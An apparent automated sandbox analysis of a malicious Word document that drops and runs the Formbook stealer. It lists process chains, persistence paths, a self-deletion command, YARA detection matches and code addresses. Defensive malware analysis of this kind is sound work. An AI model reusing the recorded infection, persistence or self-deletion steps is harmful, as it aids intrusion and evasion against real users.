          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0096905A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00953040
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0094E2E9
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_009F1238
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_009763DB
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0094F3CF
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00952305
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00957353
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0099A37B
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00985485
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00961489
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0098D47D
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0096C5F0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0095351F
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00996540
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00954680
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0095E6C1
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_009F2622
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_009D579A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0095C7BC
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_009857C3
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_009EF8EE
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0095C85C
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0097286D
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_009F098E
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_009529B2
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_009669FE
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_009D5955
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00A03A83
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_009FCBA4
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0094FBD7
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_009DDBDA
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00977B00
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_009EFDDD
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00980D3B
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0095CD5B
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00982E2F
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0096EE4C
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_00960F3F
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 15_2_0097DF7C
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008BE0C6
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008ED005
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008C3040
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008D905A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008BE2E9
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_00961238
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_009663BF
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008BF3CF
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008E63DB
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008C2305
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008C7353
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_0090A37B
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008D1489
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008F5485
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008FD47D
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008DC5F0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008C351F
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_00906540
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008C4680
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008CE6C1
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_0090A634
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_00962622
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_0094579A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008CC7BC
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008F57C3
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_0095F8EE
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008CC85C
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008E286D
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_0096098E
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008C29B2
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008D69FE
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_00945955
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_00973A83
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_0096CBA4
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_0094DBDA
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008BFBD7
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008E7B00
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_0095FDDD
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008F0D3B
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008CCD5B
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008F2E2F
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008DEE4C
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_0095CFB1
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008D0F3F
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: 16_2_008EDF7C
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 0214DF5C appears 123 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 0214E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 021BF970 appears 84 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 0219373B appears 245 times
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: String function: 02193F92 appears 132 times
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: String function: 008BDF5C appears 119 times
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: String function: 0090373B appears 238 times
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: String function: 00993F92 appears 108 times
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: String function: 0092F970 appears 81 times
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: String function: 00903F92 appears 132 times
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: String function: 0099373B appears 238 times
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: String function: 009BF970 appears 81 times
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: String function: 0094E2A8 appears 38 times
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: String function: 008BE2A8 appears 38 times
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeCode function: String function: 0094DF5C appears 118 times
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: String function: 00993F92 appears 132 times
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: String function: 0099373B appears 248 times
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: String function: 009BF970 appears 84 times
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: String function: 0094E2A8 appears 60 times
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: String function: 0094DF5C appears 130 times
          Source: 0000000C.00000002.2389941869.0000000000330000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.2389941869.0000000000330000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.2389888753.0000000000280000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.2389888753.0000000000280000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.2299563843.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.2299563843.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.2203049931.0000000000330000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.2203049931.0000000000330000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.2203016993.0000000000300000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.2203016993.0000000000300000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 16.2.firefos.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 16.2.firefos.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 15.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 15.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 15.2.firefos.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 15.2.firefos.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 16.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 16.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.skypound83892.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.skypound83892.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.skypound83892.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.skypound83892.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: skypoundx[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: skypound83892.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: firefos.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: explorer.exe, 00000007.00000000.2144811362.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
          Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@18/9@6/4
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$MAXTRADING.docJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCD2D.tmpJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: VOMAXTRADING.docVirustotal: Detection: 43%
          Source: VOMAXTRADING.docReversingLabs: Detection: 39%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\skypound83892.exe C:\Users\user\AppData\Roaming\skypound83892.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\skypound83892.exe C:\Users\user\AppData\Roaming\skypound83892.exe
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe'
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\skypound83892.exe'
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\skypound83892.exe C:\Users\user\AppData\Roaming\skypound83892.exe
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeProcess created: C:\Users\user\AppData\Roaming\skypound83892.exe C:\Users\user\AppData\Roaming\skypound83892.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe'
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exe
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\skypound83892.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
